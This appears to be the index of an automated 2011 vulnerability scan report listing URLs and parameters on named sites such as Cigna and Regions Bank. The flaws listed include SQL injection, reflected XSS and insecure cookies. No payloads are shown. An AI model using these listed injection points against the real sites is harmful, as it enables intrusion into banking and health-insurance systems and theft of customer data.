XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05162011-05

Report generated byXSS.CX at Mon May 16 17:32:49 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search


Loading

1. SQL injection

1.1. https://my.cigna.com/mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp [PD_STATEFUL_cf31cef6-4b84-11e0-9e32-20548964aa77 cookie]

1.2. https://my.cigna.com/mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp [PageLoadMilliSecs XML attribute]

1.3. https://my.cigna.com/mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp [Plugins XML attribute]

1.4. https://secureapps.regions.com/oao/app01.aspx [ctl00%24ContentPlaceHolder1%24txtPin parameter]

1.5. http://www.paperg.com/flyerboard/albany-times-union/1552/0.html [REST URL parameter 3]

1.6. http://www.paperg.com/flyerboard/app.com/1992/0.html [REST URL parameter 3]

1.7. http://www.paperg.com/flyerboard/code-enforcement-officer/3017/30085.html [REST URL parameter 3]

1.8. http://www.paperg.com/flyerboard/code-enforcement-officer/3023/30085.html [REST URL parameter 3]

1.9. http://www.paperg.com/flyerboard/conifer-park/1552/45966.html [REST URL parameter 3]

1.10. http://www.paperg.com/flyerboard/conifer-park/1753/45966.html [REST URL parameter 3]

1.11. http://www.paperg.com/flyerboard/electrical-sub-code/3474/44819.html [REST URL parameter 3]

1.12. http://www.paperg.com/flyerboard/helderberg-mountain/1552/43055.html [REST URL parameter 3]

1.13. http://www.paperg.com/flyerboard/mount--loretto/1753/45967.html [REST URL parameter 3]

1.14. http://www.paperg.com/flyerboard/mount-loretto/1552/45967.html [REST URL parameter 3]

1.15. http://www.paperg.com/flyerboard/northwoods-health/1552/45935.html [REST URL parameter 3]

1.16. http://www.paperg.com/flyerboard/northwoods-health/1753/45935.html [REST URL parameter 3]

1.17. http://www.paperg.com/flyerboard/nyprig/1552/45945.html [REST URL parameter 3]

1.18. http://www.paperg.com/flyerboard/nyprig/1753/45945.html [REST URL parameter 3]

1.19. http://www.paperg.com/flyerboard/old-songs-festival/1552/45413.html [REST URL parameter 3]

1.20. http://www.paperg.com/flyerboard/olsens/1552/42482.html [REST URL parameter 3]

1.21. http://www.paperg.com/flyerboard/pathways/1552/43051.html [REST URL parameter 3]

1.22. http://www.paperg.com/flyerboard/pathways/1753/43051.html [REST URL parameter 3]

1.23. http://www.paperg.com/flyerboard/residence-inn-by-marriott/1552/45964.html [REST URL parameter 3]

1.24. http://www.paperg.com/flyerboard/residence-inn-by-marriott/1753/45964.html [REST URL parameter 3]

1.25. http://www.paperg.com/flyerboard/seton-health/1552/45970.html [REST URL parameter 3]

1.26. http://www.paperg.com/flyerboard/seton-health/1753/45970.html [REST URL parameter 3]

1.27. http://www.paperg.com/flyerboard/your-business-or-event-could-be-here/1552/222.html [REST URL parameter 3]

1.28. http://www.paperg.com/jsfb/embed.php [bid parameter]

1.29. http://www.regions.com/about_regions/company_info.rf [REST URL parameter 1]

1.30. http://www.regions.com/about_regions/email_fraud.rf [REST URL parameter 1]

1.31. http://www.regions.com/about_regions/privacy_security.rf [REST URL parameter 1]

1.32. http://www.regions.com/about_regions/protecting_self_online.rf [REST URL parameter 1]

1.33. http://www.regions.com/about_regions/report_fraud.rf [REST URL parameter 1]

1.34. http://www.regions.com/personal_banking/email_starting_net.rf [REST URL parameter 1]

1.35. http://www.regions.com/personal_banking/get_started_autoloan.rf [REST URL parameter 1]

1.36. http://www.regions.com/personal_banking/get_started_cds.rf [REST URL parameter 1]

1.37. http://www.regions.com/personal_banking/get_started_heloan.rf [REST URL parameter 1]

1.38. http://www.regions.com/personal_banking/get_started_heloc.rf [REST URL parameter 1]

1.39. http://www.regions.com/personal_banking/get_started_installmentloan.rf [REST URL parameter 1]

1.40. http://www.regions.com/personal_banking/get_started_lifegreen_checking.rf [REST URL parameter 1]

1.41. http://www.regions.com/personal_banking/loans_credit.rf [REST URL parameter 1]

1.42. http://www.regions.com/personal_banking/online_banking_help.rf [REST URL parameter 1]

1.43. http://www.regions.com/personal_banking/online_security.rf [REST URL parameter 1]

1.44. http://www.regions.com/personal_banking/open_account.rf [REST URL parameter 1]

2. Cross-site scripting (reflected)

2.1. http://cigna.com/favicon.ico [REST URL parameter 1]

2.2. http://cigna.com/login_registration/index.html [REST URL parameter 1]

2.3. http://cigna.com/login_registration/index.html [REST URL parameter 2]

2.4. http://cigna.com/sites/toolkit/managers_disability/home.htm [REST URL parameter 1]

2.5. http://cigna.com/sites/toolkit/managers_disability/home.htm [REST URL parameter 2]

2.6. http://cigna.com/sites/toolkit/managers_disability/home.htm [REST URL parameter 3]

2.7. http://cigna.com/sites/toolkit/managers_disability/home.htm [REST URL parameter 4]

2.8. http://cigna.com/sites/toolkit/managers_disability/return/index.htm [REST URL parameter 1]

2.9. http://cigna.com/sites/toolkit/managers_disability/return/index.htm [REST URL parameter 2]

2.10. http://cigna.com/sites/toolkit/managers_disability/return/index.htm [REST URL parameter 3]

2.11. http://cigna.com/sites/toolkit/managers_disability/return/index.htm [REST URL parameter 4]

2.12. http://cigna.com/sites/toolkit/managers_disability/return/index.htm [REST URL parameter 5]

2.13. http://cigna.com/sites/toolkit/physicians_disability/home/forms/index.htm [REST URL parameter 1]

2.14. http://cigna.com/sites/toolkit/physicians_disability/home/forms/index.htm [REST URL parameter 2]

2.15. http://cigna.com/sites/toolkit/physicians_disability/home/forms/index.htm [REST URL parameter 3]

2.16. http://cigna.com/sites/toolkit/physicians_disability/home/forms/index.htm [REST URL parameter 4]

2.17. http://cigna.com/sites/toolkit/physicians_disability/home/forms/index.htm [REST URL parameter 5]

2.18. http://cigna.com/sites/toolkit/physicians_disability/home/forms/index.htm [REST URL parameter 6]

2.19. http://cigna.com/sites/toolkit/physicians_disability/index.htm [REST URL parameter 1]

2.20. http://cigna.com/sites/toolkit/physicians_disability/index.htm [REST URL parameter 2]

2.21. http://cigna.com/sites/toolkit/physicians_disability/index.htm [REST URL parameter 3]

2.22. http://cigna.com/sites/toolkit/physicians_disability/index.htm [REST URL parameter 4]

2.23. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

2.24. https://secureapps.regions.com/OAO/DESGetFiles.aspx [files parameter]

2.25. https://sso.corp.cigna.com/corp/sso/professional/controller [DESTINATION parameter]

2.26. https://sso.corp.cigna.com/corp/sso/professional/controller [fname parameter]

2.27. https://sso.corp.cigna.com/corp/sso/professional/controller [lname parameter]

2.28. http://www.paperg.com/flyerboard/albany-times-union/1552/0.html [boards%5B%5D parameter]

2.29. http://www.paperg.com/jsfb/embed.php [bid parameter]

2.30. http://www.paperg.com/jsfb/embed.php [bid parameter]

2.31. http://www.paperg.com/jsfb/embed.php [bid parameter]

2.32. http://www.paperg.com/jsfb/embed.php [name of an arbitrarily supplied request parameter]

2.33. http://www.paperg.com/jsfb/embed.php [name of an arbitrarily supplied request parameter]

3. Flash cross-domain policy

3.1. http://ajax.googleapis.com/crossdomain.xml

3.2. http://statse.webtrendslive.com/crossdomain.xml

3.3. https://www.paperg.com/crossdomain.xml

3.4. http://www.placelocal.com/crossdomain.xml

3.5. http://ads.bridgetrack.com/crossdomain.xml

3.6. http://feeds.bbci.co.uk/crossdomain.xml

3.7. http://newsrss.bbc.co.uk/crossdomain.xml

3.8. http://www.paperg.com/crossdomain.xml

3.9. http://www.regions.com/crossdomain.xml

3.10. https://www.regions.com/crossdomain.xml

3.11. http://xsinternational.app6.hubspot.com/crossdomain.xml

4. Cleartext submission of password

4.1. http://cigna.com/

4.2. http://www.paperg.com/

4.3. http://www.paperg.com/company.php

4.4. http://www.paperg.com/contact.php

4.5. http://www.paperg.com/join.php

4.6. http://www.paperg.com/press.php

4.7. http://www.paperg.com/publishers/flyerboard.php

4.8. http://www.paperg.com/publishers/placelocal.php

4.9. http://www.paperg.com/support.php

5. SSL cookie without secure flag set

5.1. https://cignaforhcp.cigna.com/corp/sso/ci/selfsvc/forgotId.do

5.2. https://cignaforhcp.cigna.com/corp/sso/ci/selfsvc/forgotPassword.do

5.3. https://cignaforhcp.cigna.com/wps/portal

5.4. https://my.cigna.com/mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp

5.5. https://my.cigna.com/web/public/forgotid

5.6. https://my.cigna.com/web/public/forgotpassword

5.7. https://securebank.regions.com/ForgottenPassword.aspx

5.8. https://securebank.regions.com/login.aspx

5.9. https://sso.corp.cigna.com/corp/sso/professional/controller

5.10. https://www.paperg.com/forgot.php

5.11. https://www.planservices.com/regions/

5.12. https://www.regions.com/

5.13. https://www.regions.com/personal_banking.rf

5.14. https://wwwa.applyonlinenow.com/USCCapp/Ctl/entry

5.15. https://cignaforhcp.cigna.com/ProviderTheme/themes/html/CignaProvider2/images/cigna/favicon.ico

5.16. https://cignaforhcp.cigna.com/portal/images/arrowonly_gold.gif

5.17. https://my.cigna.com/mycignatheme/js/min/jsTop.js

5.18. https://my.cigna.com/mycignatheme/js/min/jsTop.js

5.19. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png

5.20. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png

5.21. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png

5.22. https://my.cigna.com/web/public/guest

5.23. https://my.cigna.com/web/public/guest

5.24. https://secure.regionsmortgage.com/favicon.ico

5.25. https://secureapps.regions.com/

5.26. https://secureapps.regions.com/OAO/DESGetFiles.aspx

5.27. https://secureapps.regions.com/favicon.ico

5.28. https://secureapps.regions.com/oao/DES/Appearance/Validation/Validation.css

5.29. https://secureapps.regions.com/oao/ErrorPage.aspx

5.30. https://secureapps.regions.com/oao/FormHandler.js

5.31. https://secureapps.regions.com/oao/Images/confirmation.gif

5.32. https://secureapps.regions.com/oao/Images/funding.gif

5.33. https://secureapps.regions.com/oao/Images/gettingstarted.gif

5.34. https://secureapps.regions.com/oao/Images/helpIcon.gif

5.35. https://secureapps.regions.com/oao/Images/loading7.gif

5.36. https://secureapps.regions.com/oao/Images/yourinformation.gif

5.37. https://secureapps.regions.com/oao/Scripts/jquery.js

5.38. https://secureapps.regions.com/oao/Scripts/thickbox.js

5.39. https://secureapps.regions.com/oao/app01.aspx

5.40. https://secureapps.regions.com/oao/app02.aspx

5.41. https://secureapps.regions.com/oao/images/arrowOrange.gif

5.42. https://secureapps.regions.com/oao/images/bgDot.gif

5.43. https://secureapps.regions.com/oao/images/continue.gif

5.44. https://secureapps.regions.com/oao/images/ehl_logo.gif

5.45. https://secureapps.regions.com/oao/images/error.gif

5.46. https://secureapps.regions.com/oao/images/homepage.gif

5.47. https://secureapps.regions.com/oao/images/icon_secure.gif

5.48. https://secureapps.regions.com/oao/images/loadingAnimation.gif

5.49. https://secureapps.regions.com/oao/scripts/wtbase.js

5.50. https://secureapps.regions.com/oao/styles/main.css

5.51. https://secureapps.regions.com/oao/styles/thickbox.css

5.52. https://securebank.regions.com/SystemUnavailable.aspx

5.53. https://securebank.regions.com/VAM/2_0_2/VAM.js

5.54. https://securebank.regions.com/VAM/2_0_2/VAML2.js

5.55. https://securebank.regions.com/VAM/2_0_2/VAM_DTTB.js

5.56. https://securebank.regions.com/favicon.ico

5.57. https://securebank.regions.com/images/btnContinue.gif

5.58. https://securebank.regions.com/images/equalhousing.gif

5.59. https://securebank.regions.com/images/green/rf_logo.gif

5.60. https://securebank.regions.com/images/red_arrow.gif

5.61. https://securebank.regions.com/images/spacer.gif

5.62. https://securebank.regions.com/script/regions.js

5.63. https://securebank.regions.com/styles/styles.AmSouth.css

5.64. https://securebank.regions.com/styles/stylesprint.css

5.65. https://sso.corp.cigna.com/

5.66. https://sso.corp.cigna.com/corp/sso/images/CIGNAforpros_logo1.gif

5.67. https://sso.corp.cigna.com/corp/sso/images/arrow_orange.gif

5.68. https://sso.corp.cigna.com/corp/sso/images/cigna_logo.jpg

5.69. https://sso.corp.cigna.com/corp/sso/images/header_forgot_ID.gif

5.70. https://sso.corp.cigna.com/corp/sso/images/header_forgot_password.gif

5.71. https://sso.corp.cigna.com/corp/sso/images/pshim.gif

5.72. https://sso.corp.cigna.com/corp/sso/images/truesecure.gif

5.73. https://sso.corp.cigna.com/corp/sso/images/yahoo_logo.gif

5.74. https://sso.corp.cigna.com/corp/sso/includes/portal_styles.css

5.75. https://sso.corp.cigna.com/favicon.ico

5.76. https://www.regions.com/App_Themes/2010/Ems.css

5.77. https://www.regions.com/App_Themes/2010/img/staticBackgrounds.gif

5.78. https://www.regions.com/App_Themes/2010/img/staticFlyouts.png

5.79. https://www.regions.com/App_Themes/2010/img/staticImages.gif

5.80. https://www.regions.com/Img/sm_558800_oo.gif

5.81. https://www.regions.com/JS/cmbd-jquery.min.js

5.82. https://www.regions.com/JS/loadMedia.min.js

5.83. https://www.regions.com/favicon.ico

5.84. https://www.regions.com/js/_bt.js

5.85. https://www.regions.com/js/wtbase.js

5.86. https://www.regions.com/virtualMedia/img2612.jpg

5.87. https://www.regions.com/virtualMedia/img3090.jpg

5.88. https://www.regions.com/virtualMedia/img3094.jpg

5.89. https://www.regions.com/virtualMedia/img3107.jpg

5.90. https://www.regions.com/virtualMedia/img3108.jpg

5.91. https://www.regions.com/virtualMedia/img3132.jpg

5.92. https://www.regions.com/virtualMedia/img506.gif

6. Session token in URL

6.1. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

6.2. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo

6.3. http://mt1.googleapis.com/mapslt/ft

7. Cookie scoped to parent domain

7.1. http://www.placelocal.com/forgot_password.php

7.2. http://cf.addthis.com/red/p.json

7.3. http://id.google.com/verify/EAAAALnVVncDUFzfZZPpW0uBcco.gif

7.4. http://id.google.com/verify/EAAAAMEFFrXigusXUqdbUQOi-mU.gif

7.5. https://my.cigna.com/web/public/forgotid

7.6. https://my.cigna.com/web/public/forgotpassword

7.7. https://my.cigna.com/web/public/guest

7.8. https://secure.regionsmortgage.com/favicon.ico

7.9. https://sso.corp.cigna.com/

7.10. https://sso.corp.cigna.com/corp/sso/images/CIGNAforpros_logo1.gif

7.11. https://sso.corp.cigna.com/corp/sso/images/arrow_orange.gif

7.12. https://sso.corp.cigna.com/corp/sso/images/cigna_logo.jpg

7.13. https://sso.corp.cigna.com/corp/sso/images/header_forgot_ID.gif

7.14. https://sso.corp.cigna.com/corp/sso/images/header_forgot_password.gif

7.15. https://sso.corp.cigna.com/corp/sso/images/pshim.gif

7.16. https://sso.corp.cigna.com/corp/sso/images/truesecure.gif

7.17. https://sso.corp.cigna.com/corp/sso/images/yahoo_logo.gif

7.18. https://sso.corp.cigna.com/corp/sso/includes/portal_styles.css

7.19. https://sso.corp.cigna.com/corp/sso/professional/controller

7.20. https://sso.corp.cigna.com/favicon.ico

7.21. http://va.px.invitemedia.com/pixel

8. Cookie without HttpOnly flag set

8.1. https://cignaforhcp.cigna.com/corp/sso/ci/selfsvc/forgotId.do

8.2. https://cignaforhcp.cigna.com/corp/sso/ci/selfsvc/forgotPassword.do

8.3. https://cignaforhcp.cigna.com/wps/portal

8.4. https://my.cigna.com/mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp

8.5. https://my.cigna.com/web/public/forgotid

8.6. https://my.cigna.com/web/public/forgotpassword

8.7. https://securebank.regions.com/ForgottenPassword.aspx

8.8. https://securebank.regions.com/login.aspx

8.9. https://sso.corp.cigna.com/corp/sso/professional/controller

8.10. http://www.paperg.com/flyerboard/albany-times-union/1552/0.html

8.11. https://www.paperg.com/forgot.php

8.12. http://www.placelocal.com/forgot_password.php

8.13. https://www.planservices.com/regions/

8.14. https://wwwa.applyonlinenow.com/USCCapp/Ctl/entry

8.15. http://ads.bridgetrack.com/site/rtgt.asp

8.16. http://cf.addthis.com/red/p.json

8.17. https://cignaforhcp.cigna.com/ProviderTheme/themes/html/CignaProvider2/images/cigna/favicon.ico

8.18. https://cignaforhcp.cigna.com/portal/images/arrowonly_gold.gif

8.19. https://my.cigna.com/mycignatheme/js/min/jsTop.js

8.20. https://my.cigna.com/mycignatheme/js/min/jsTop.js

8.21. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png

8.22. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png

8.23. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png

8.24. https://my.cigna.com/web/public/guest

8.25. https://my.cigna.com/web/public/guest

8.26. http://regions.com/

8.27. https://secure.regionsmortgage.com/favicon.ico

8.28. https://secureapps.regions.com/

8.29. https://secureapps.regions.com/OAO/DESGetFiles.aspx

8.30. https://secureapps.regions.com/favicon.ico

8.31. https://secureapps.regions.com/oao/DES/Appearance/Validation/Validation.css

8.32. https://secureapps.regions.com/oao/ErrorPage.aspx

8.33. https://secureapps.regions.com/oao/FormHandler.js

8.34. https://secureapps.regions.com/oao/Images/confirmation.gif

8.35. https://secureapps.regions.com/oao/Images/funding.gif

8.36. https://secureapps.regions.com/oao/Images/gettingstarted.gif

8.37. https://secureapps.regions.com/oao/Images/helpIcon.gif

8.38. https://secureapps.regions.com/oao/Images/loading7.gif

8.39. https://secureapps.regions.com/oao/Images/yourinformation.gif

8.40. https://secureapps.regions.com/oao/Scripts/jquery.js

8.41. https://secureapps.regions.com/oao/Scripts/thickbox.js

8.42. https://secureapps.regions.com/oao/app01.aspx

8.43. https://secureapps.regions.com/oao/app02.aspx

8.44. https://secureapps.regions.com/oao/images/arrowOrange.gif

8.45. https://secureapps.regions.com/oao/images/bgDot.gif

8.46. https://secureapps.regions.com/oao/images/continue.gif

8.47. https://secureapps.regions.com/oao/images/ehl_logo.gif

8.48. https://secureapps.regions.com/oao/images/error.gif

8.49. https://secureapps.regions.com/oao/images/homepage.gif

8.50. https://secureapps.regions.com/oao/images/icon_secure.gif

8.51. https://secureapps.regions.com/oao/images/loadingAnimation.gif

8.52. https://secureapps.regions.com/oao/scripts/wtbase.js

8.53. https://secureapps.regions.com/oao/styles/main.css

8.54. https://secureapps.regions.com/oao/styles/thickbox.css

8.55. https://securebank.regions.com/SystemUnavailable.aspx

8.56. https://securebank.regions.com/VAM/2_0_2/VAM.js

8.57. https://securebank.regions.com/VAM/2_0_2/VAML2.js

8.58. https://securebank.regions.com/VAM/2_0_2/VAM_DTTB.js

8.59. https://securebank.regions.com/favicon.ico

8.60. https://securebank.regions.com/images/btnContinue.gif

8.61. https://securebank.regions.com/images/equalhousing.gif

8.62. https://securebank.regions.com/images/green/rf_logo.gif

8.63. https://securebank.regions.com/images/red_arrow.gif

8.64. https://securebank.regions.com/images/spacer.gif

8.65. https://securebank.regions.com/script/regions.js

8.66. https://securebank.regions.com/styles/styles.AmSouth.css

8.67. https://securebank.regions.com/styles/stylesprint.css

8.68. https://sso.corp.cigna.com/

8.69. https://sso.corp.cigna.com/corp/sso/images/CIGNAforpros_logo1.gif

8.70. https://sso.corp.cigna.com/corp/sso/images/arrow_orange.gif

8.71. https://sso.corp.cigna.com/corp/sso/images/cigna_logo.jpg

8.72. https://sso.corp.cigna.com/corp/sso/images/header_forgot_ID.gif

8.73. https://sso.corp.cigna.com/corp/sso/images/header_forgot_password.gif

8.74. https://sso.corp.cigna.com/corp/sso/images/pshim.gif

8.75. https://sso.corp.cigna.com/corp/sso/images/truesecure.gif

8.76. https://sso.corp.cigna.com/corp/sso/images/yahoo_logo.gif

8.77. https://sso.corp.cigna.com/corp/sso/includes/portal_styles.css

8.78. https://sso.corp.cigna.com/favicon.ico

8.79. http://statse.webtrendslive.com/dcs4b71fc10000gs8u88h5t1k_6n2i/dcs.gif

8.80. http://statse.webtrendslive.com/dcspiqc94wz5bdfiwi4batkw3_5h6k/dcs.gif

8.81. http://va.px.invitemedia.com/pixel

8.82. http://www.bankofamerica.com/global/mvc_objects/stylesheet/hs2_mvc_content_style_default2.css

8.83. http://www.mycigna.com/rte/public/gatekeeper

8.84. http://www.placelocal.com/

8.85. http://www.regions.com/

8.86. http://www.regions.com/App_Themes/2010/Ems.css

8.87. http://www.regions.com/App_Themes/2010/img/arrowGray_Small.gif

8.88. http://www.regions.com/App_Themes/2010/img/hdrItemSep.gif

8.89. http://www.regions.com/App_Themes/2010/img/headerfullBG.gif

8.90. http://www.regions.com/App_Themes/2010/img/staticBackgrounds.gif

8.91. http://www.regions.com/App_Themes/2010/img/staticFlyouts.png

8.92. http://www.regions.com/App_Themes/2010/img/staticImages.gif

8.93. http://www.regions.com/App_Themes/IE6/Ems.css

8.94. http://www.regions.com/App_Themes/IE6/img/hdrItemSep.gif

8.95. http://www.regions.com/App_Themes/IE6/img/staticBackgrounds.gif

8.96. http://www.regions.com/App_Themes/IE6/img/staticFlyouts.png

8.97. http://www.regions.com/App_Themes/IE6/img/staticImages.gif

8.98. http://www.regions.com/App_Themes/Promotion/Ems.css

8.99. http://www.regions.com/App_Themes/Promotion/img/arrowGray_Small.gif

8.100. http://www.regions.com/App_Themes/Promotion/img/staticBackgrounds.gif

8.101. http://www.regions.com/App_Themes/Promotion/img/staticImages.gif

8.102. http://www.regions.com/Img/sm_558800_oo.gif

8.103. http://www.regions.com/JS/cmbd-jquery.min.js

8.104. http://www.regions.com/JS/loadMedia.js

8.105. http://www.regions.com/JS/loadMedia.min.js

8.106. http://www.regions.com/about_regions/IR_investorrelations.html

8.107. http://www.regions.com/about_regions/company_info.rf

8.108. http://www.regions.com/about_regions/email_fraud.rf

8.109. http://www.regions.com/about_regions/privacy_security.rf

8.110. http://www.regions.com/about_regions/protecting_self_online.rf

8.111. http://www.regions.com/about_regions/report_fraud.rf

8.112. http://www.regions.com/favicon.ico

8.113. http://www.regions.com/img/arrowGray_Small.gif

8.114. http://www.regions.com/js/_bt.js

8.115. http://www.regions.com/js/wtbase.js

8.116. http://www.regions.com/personal_banking/email_starting_net.rf

8.117. http://www.regions.com/personal_banking/get_started_autoloan.rf

8.118. http://www.regions.com/personal_banking/get_started_cds.rf

8.119. http://www.regions.com/personal_banking/get_started_heloan.rf

8.120. http://www.regions.com/personal_banking/get_started_heloc.rf

8.121. http://www.regions.com/personal_banking/get_started_installmentloan.rf

8.122. http://www.regions.com/personal_banking/get_started_lifegreen_checking.rf

8.123. http://www.regions.com/personal_banking/loans_credit.rf

8.124. http://www.regions.com/personal_banking/online_banking_help.rf

8.125. http://www.regions.com/personal_banking/online_security.rf

8.126. http://www.regions.com/personal_banking/open_account.rf

8.127. http://www.regions.com/virtualMedia/img1213.gif

8.128. http://www.regions.com/virtualMedia/img2020.gif

8.129. http://www.regions.com/virtualMedia/img2027.gif

8.130. http://www.regions.com/virtualMedia/img2028.gif

8.131. http://www.regions.com/virtualMedia/img243.gif

8.132. http://www.regions.com/virtualMedia/img422.gif

8.133. http://www.regions.com/virtualMedia/img506.gif

8.134. http://www.regions.com/virtualMedia/img537.gif

8.135. http://www.regions.com/virtualMedia/img563.gif

8.136. http://www.regions.com/virtualMedia/img588.gif

8.137. http://www.regions.com/virtualMedia/img828.gif

8.138. http://www.regions.com/virtualmedia/img240.gif

8.139. http://www.regions.com/virtualmedia/img265.gif

8.140. http://www.regions.com/virtualmedia/img286.jpg

8.141. http://www.regions.com/wrapperHeader.aspx

8.142. https://www.regions.com/

8.143. https://www.regions.com/App_Themes/2010/Ems.css

8.144. https://www.regions.com/App_Themes/2010/img/staticBackgrounds.gif

8.145. https://www.regions.com/App_Themes/2010/img/staticFlyouts.png

8.146. https://www.regions.com/App_Themes/2010/img/staticImages.gif

8.147. https://www.regions.com/Img/sm_558800_oo.gif

8.148. https://www.regions.com/JS/cmbd-jquery.min.js

8.149. https://www.regions.com/JS/loadMedia.min.js

8.150. https://www.regions.com/favicon.ico

8.151. https://www.regions.com/js/_bt.js

8.152. https://www.regions.com/js/wtbase.js

8.153. https://www.regions.com/personal_banking.rf

8.154. https://www.regions.com/virtualMedia/img2612.jpg

8.155. https://www.regions.com/virtualMedia/img3090.jpg

8.156. https://www.regions.com/virtualMedia/img3094.jpg

8.157. https://www.regions.com/virtualMedia/img3107.jpg

8.158. https://www.regions.com/virtualMedia/img3108.jpg

8.159. https://www.regions.com/virtualMedia/img3132.jpg

8.160. https://www.regions.com/virtualMedia/img506.gif

8.161. http://www.regionsmortgage.com/BeforeYouBegin/ApplyNow

8.162. http://www.xsnet.com/

8.163. http://xsinternational.app6.hubspot.com/salog.js.aspx

9. Password field with autocomplete enabled

9.1. http://cigna.com/

9.2. https://cignaforhcp.cigna.com/wps/portal

9.3. https://www.frontrowusa.com/Cart/Address

9.4. https://www.frontrowusa.com/members/login

9.5. http://www.paperg.com/

9.6. http://www.paperg.com/company.php

9.7. http://www.paperg.com/contact.php

9.8. http://www.paperg.com/join.php

9.9. http://www.paperg.com/press.php

9.10. http://www.paperg.com/publishers/flyerboard.php

9.11. http://www.paperg.com/publishers/placelocal.php

9.12. http://www.paperg.com/support.php

9.13. https://www.paperg.com/

9.14. https://www.paperg.com/post.php

9.15. https://www.paperg.com/post.php

9.16. http://www.placelocal.com/

9.17. http://www.placelocal.com/forgot_password.php

9.18. https://www.planservices.com/regions/

10. Referer-dependent response

11. Cross-domain POST

11.1. http://cigna.com/

11.2. http://www.frontrowusa.com/

11.3. http://www.frontrowusa.com/Concerts/U2_Tickets.htm

11.4. http://www.frontrowusa.com/Event/U2_Rescheduled_from_6/12/2010_Invesco_Field_at_Mile_High_U2_2011-05-21_7:00_PM_Tickets.htm

11.5. http://www.frontrowusa.com/Sell-Tickets

11.6. http://www.frontrowusa.com/Sports_Tickets

11.7. https://www.frontrowusa.com/Cart

11.8. https://www.frontrowusa.com/Cart/Address

11.9. https://www.frontrowusa.com/members/login

11.10. http://www.mycigna.com/

12. Cross-domain Referer leakage

12.1. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr

12.2. http://phx.corporate-ir.net/phoenix.zhtml

12.3. https://securebank.regions.com/SystemUnavailable.aspx

12.4. http://www.google.com/search

12.5. http://www.google.com/search

12.6. http://www.mycigna.com/sslreq.html

12.7. http://www.paperg.com/flyerboard/albany-times-union/1552/0.html

12.8. http://www.regions.com/wrapperHeader.aspx

12.9. http://www.regionsmortgage.com/Error/Error

12.10. http://www.xsnet.com/Portals/64787/footerStuff.html

13. Cross-domain script include

13.1. https://secureapps.regions.com/oao/ErrorPage.aspx

13.2. https://secureapps.regions.com/oao/app01.aspx

13.3. https://secureapps.regions.com/oao/app02.aspx

13.4. http://www.cloudscan.me/p/enterprise-exploit-coverage-by-hoyt-llc.html

13.5. http://www.frontrowusa.com/

13.6. http://www.frontrowusa.com/Concerts/U2_Tickets.htm

13.7. http://www.frontrowusa.com/Event/U2_Rescheduled_from_6/12/2010_Invesco_Field_at_Mile_High_U2_2011-05-21_7:00_PM_Tickets.htm

13.8. http://www.frontrowusa.com/Sell-Tickets

13.9. http://www.frontrowusa.com/Sports_Tickets

13.10. https://www.frontrowusa.com/Cart

13.11. https://www.frontrowusa.com/Cart/Address

13.12. https://www.frontrowusa.com/members/login

13.13. http://www.paperg.com/

13.14. http://www.paperg.com/company.php

13.15. http://www.paperg.com/contact.php

13.16. http://www.paperg.com/flyerboard/albany-times-union/1552/0.html

13.17. http://www.paperg.com/flyerboard/app.com/1992/0.html

13.18. http://www.paperg.com/flyerboard/code-enforcement-officer/3017/30085.html

13.19. http://www.paperg.com/flyerboard/code-enforcement-officer/3023/30085.html

13.20. http://www.paperg.com/flyerboard/conifer-park/1552/45966.html

13.21. http://www.paperg.com/flyerboard/conifer-park/1753/45966.html

13.22. http://www.paperg.com/flyerboard/electrical-sub-code/3474/44819.html

13.23. http://www.paperg.com/flyerboard/helderberg-mountain/1552/43055.html

13.24. http://www.paperg.com/flyerboard/mount--loretto/1753/45967.html

13.25. http://www.paperg.com/flyerboard/mount-loretto/1552/45967.html

13.26. http://www.paperg.com/flyerboard/northwoods-health/1552/45935.html

13.27. http://www.paperg.com/flyerboard/northwoods-health/1753/45935.html

13.28. http://www.paperg.com/flyerboard/nyprig/1552/45945.html

13.29. http://www.paperg.com/flyerboard/nyprig/1753/45945.html

13.30. http://www.paperg.com/flyerboard/old-songs-festival/1552/45413.html

13.31. http://www.paperg.com/flyerboard/olsens/1552/42482.html

13.32. http://www.paperg.com/flyerboard/pathways/1552/43051.html

13.33. http://www.paperg.com/flyerboard/pathways/1753/43051.html

13.34. http://www.paperg.com/flyerboard/residence-inn-by-marriott/1552/45964.html

13.35. http://www.paperg.com/flyerboard/residence-inn-by-marriott/1753/45964.html

13.36. http://www.paperg.com/flyerboard/seton-health/1552/45970.html

13.37. http://www.paperg.com/flyerboard/seton-health/1753/45970.html

13.38. http://www.paperg.com/flyerboard/your-business-or-event-could-be-here/1552/222.html

13.39. http://www.paperg.com/join.php

13.40. http://www.paperg.com/press.php

13.41. http://www.paperg.com/publishers/flyerboard.php

13.42. http://www.paperg.com/publishers/placelocal.php

13.43. http://www.paperg.com/support.php

13.44. https://www.paperg.com/

13.45. https://www.paperg.com/forgot.php

13.46. https://www.paperg.com/post.php

13.47. http://www.placelocal.com/

13.48. http://www.xsnet.com/

13.49. http://www.xsnet.com/datacenter-relocation-services/

13.50. http://www.xsnet.com/it-asset-disposition-services/

14. Email addresses disclosed

14.1. https://my.cigna.com/mycignatheme/js/min/js.js

14.2. https://my.cigna.com/mycignatheme/js/min/jsTop.js

14.3. https://securebank.regions.com/ForgottenPassword.aspx

14.4. https://securebank.regions.com/SystemUnavailable.aspx

14.5. https://securebank.regions.com/VAM/2_0_2/VAM.js

14.6. https://securebank.regions.com/VAM/2_0_2/VAML2.js

